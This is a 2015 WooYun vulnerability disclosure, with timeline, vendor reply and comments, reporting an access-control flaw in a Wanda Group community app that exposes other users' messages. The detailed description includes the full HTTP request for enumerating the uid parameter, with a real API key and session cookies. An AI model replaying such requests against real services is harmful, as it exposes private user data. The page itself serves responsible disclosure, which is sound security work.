当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150553

漏洞标题:大连万达集团某APP设计缺陷修复不完善可再次查看用户消息

相关厂商:大连万达集团股份有限公司

漏洞作者: 高小厨

提交时间:2015-10-30 15:21

修复时间:2015-12-16 18:22

公开时间:2015-12-16 18:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-01: 厂商已经确认,细节仅向厂商公开
2015-11-11: 细节向核心白帽子及相关领域专家公开
2015-11-21: 细节向普通白帽子公开
2015-12-01: 细节向实习白帽子公开
2015-12-16: 细节向公众公开

简要描述:

我没有试图寻找聪哥的万达社区账号

详细说明:

1.万达社区(又名万达笑脸墙)
2.遍历点(遍历uid就可以了)

6.png


GET http://smile.wanda.cn/app/oauth/advice?count=0&page=0&t=1446172201.354999&uid=§66609§ HTTP/1.1
Host: smile.wanda.cn
User-Agent: FaceWall/3.0 CFNetwork/711.4.6 Darwin/14.0.0
Accept-Language: zh-cn
Connection: keep-alive
Accept: */*
api_key: efcb88285b5eca212614bf4bb0a61e52
version: 3.7
Connection: keep-alive
Cookie: Accept-Encoding=gzip; api_key=efcb88285b5eca212614bf4bb0a61e52; clientid=ios; hashcode=ruantongefcb88285b5eca212614bf4bb0a61e52; headpic=http://image.wanda.cn/smilehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/mobile/2014/05/23/20140523112010_150.jpg; realname=zhj; sex=1; uid=66689; unit=wanda; user_name=ruantong; version=3.7
user_name: ruantong
clientid: ios
hashcode: 97ae6ebb3232fa5bd87e4a6ed24a665d
Accept-Encoding: gzip


漏洞证明:

1.png

2.png

3.png

5.png

修复方案:

修改消息处越权

版权声明:转载请注明来源 高小厨@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-01 18:20

厂商回复:

感谢高小厨同学的关注与贡献!马上通知业务整改!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-30 15:28 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    万达集团:“你又来了”。

  2. 2015-10-30 15:32 | Coody 认证白帽子 ( 核心白帽子 | Rank:1707 漏洞数:203 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    厨子:“我没有试图寻找聪哥的万达社区账号”

  3. 2015-10-30 15:38 | zzR 认证白帽子 ( 核心白帽子 | Rank:1394 漏洞数:123 | 收wb 1:5 无限量收 [平台担保])

    不开森

  4. 2015-10-30 15:58 | Ton7BrEak ( 普通白帽子 | Rank:237 漏洞数:48 | 吃苦耐劳,我只会第一个!)

    咦,为什么我的万达电影兑换券都没有了?是不是你干的!!

  5. 2015-10-30 18:51 | 高小厨 ( 普通白帽子 | Rank:874 漏洞数:79 | 不会吹牛的小二不是好厨子!)

    @大师兄 @Coody @zzR @Ton7BrEak 哈哈,我真的没有聪哥的联系方式